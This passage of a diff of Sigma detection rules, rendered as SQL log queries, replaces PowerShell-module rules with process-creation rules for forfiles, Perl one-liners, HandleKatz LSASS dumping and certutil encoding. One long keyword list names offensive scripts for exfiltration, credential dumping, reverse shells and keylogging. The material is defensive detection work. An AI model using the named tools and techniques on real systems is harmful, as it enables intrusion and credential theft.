Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.discovery", "attack.execution", - "attack.t1059.001" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Alternate PowerShell Hosts - PowerShell Module", - "id": "64e8e417-c19a-475a-8d19-98ea705394cc", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Use of Forfiles For Execution", + "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", + "status": "experimental", + "description": "Execute commands and binaries from the context of \"forfiles\". 
This is used as a LOLBIN for example to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Legitimate use via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" ], - "filename": 
"posh_pm_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_lolbin_forfiles.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Automated Collection Command Prompt", + "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR 
CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_automated_collection.yml" }, { - "title": "Suspicious Get Information for SMB Share - PowerShell Module", - "id": "6942bd25-5970-40ab-af49-944247103358", + "title": "Perl Inline Command Execution", + "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "status": "experimental", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "author": "frack113", + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. 
This is could be used as a way to launch a reverse shell or execute live perl code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Administrator script" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-smbshare%' ESCAPE '\\' OR ContextInfo LIKE '%get-smbshare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_smb_share_reco.yml" + "filename": "proc_creation_win_perl_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "status": "test", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
(NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Use Get-NetTCPConnection - PowerShell Module", - "id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pm_susp_get_nettcpconnection.yml" + "filename": 
"proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious Computer Machine Password by PowerShell", - "id": "e3818659-5016-4811-a73c-dde4679169d2", + "title": "Microsoft Workflow Compiler Execution", + "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", "status": "test", - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "author": "frack113", + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "author": "Nik Seetharaman, frack113", "tags": [ - "attack.initial_access", - "attack.t1078" + "attack.defense_evasion", + "attack.execution", + "attack.t1127", + "attack.t1218" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate MWC use (unlikely in modern enterprise environments)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml" + "filename": "proc_creation_win_lolbin_workflow_compiler.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "File Encoded To Base64 Via Certutil.EXE", + "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "status": "test", + "description": 
"Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR 
